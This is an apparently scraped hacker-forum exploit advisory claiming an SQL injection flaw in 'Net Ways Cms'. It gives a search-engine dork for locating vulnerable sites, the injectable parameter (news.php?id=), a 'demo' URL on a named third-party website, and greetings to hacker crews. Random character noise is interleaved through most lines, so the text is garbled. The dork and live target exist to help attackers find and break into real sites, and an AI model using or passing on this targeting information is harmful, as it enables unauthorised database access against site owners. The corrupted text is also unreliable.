################################################################################??######## 4 [0 H4 y1 k9 x) C$ ]; N
#
1 t! k- d0 a* W9 Y7 {# Exploit Title : Net Ways Cms Sql Injection Vulnerability
: b$ `1 u1 v9 M' ?0 }#
9 b" M9 g4 ~- p0 H# Author : IrIsT.Ir . a7 L& Y8 _- _% i9 w, k. L
#
' I% U; y( t5 v l# _3 |# Discovered By : Am!r 4 p& D- @) ]: s* Z
#
8 t# p# p. b$ [. U B% X \2 j. S# Home : http://IrIsT.Ir/forum , A- V/ _2 O3 l5 Y# W
# - P9 G. q2 h8 ~1 f/ A: u
# Software Link : http://www.netways.com/ www.political-security.com9 C1 X) b3 J* d+ Z7 z& B
# ; O* P# N% ?5 w
# Security Risk : High 1 M {6 q z( q8 D! w3 d
#
/ L3 [' w' ~( b/ x8 ?# Version : All Version
$ c& R1 L ~! F2 f. w3 u# + q- ?" M4 d. x( \8 C0 f5 G7 S
# Tested on : GNU/Linux Ubuntu - Windows Server - win7 " f9 O6 ~' A b7 e4 ]' \
#
+ n. `$ @" a5 ]5 Q$ |5 o9 b# Dork : intext:"Designed & developed by NetWays" ' h$ o/ c( z$ Q g" @. p
# / B2 \* k4 J5 W$ @
################################################################################??######## 4 R. k) p9 }, \2 S! s) d/ v: U
#
5 u. u& f% n' {; N/ s- i# Expl0iTs : % t# h# d* k% K: G6 |4 k
#
' d J k$ N1 n% B# http://target.com/news.php?id=[Sql]
5 E) e( M5 ?8 t# - M1 o* e# [) E. \
#
% N3 j: m/ _+ a9 ^* u# D3mo :
- p ?2 y. {' x#
! Q+ n% w g: @9 T# http://compagnieparento.com/news.php?id=7[Sql] " x c! X/ J5 z6 c# F$ ?# M' a# G
#
0 k/ P' ?5 g0 P8 Y4 J2 c################################################################################??######## ; J0 j6 |" a& x- X z$ T6 X/ p
# : j& @, O" h) C! d- x
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
, z( Z0 k- n5 G. b# P5 y! T7 r# # d% W$ ^' u7 b' e
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
( }; }+ n6 M8 \0 Q u# / ^2 Z7 \) Z$ x- n
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 4 r/ A5 }! a4 D* u1 N# M# {, m
#
F/ O: ?1 `, p1 L7 i. e################################################################################??######## |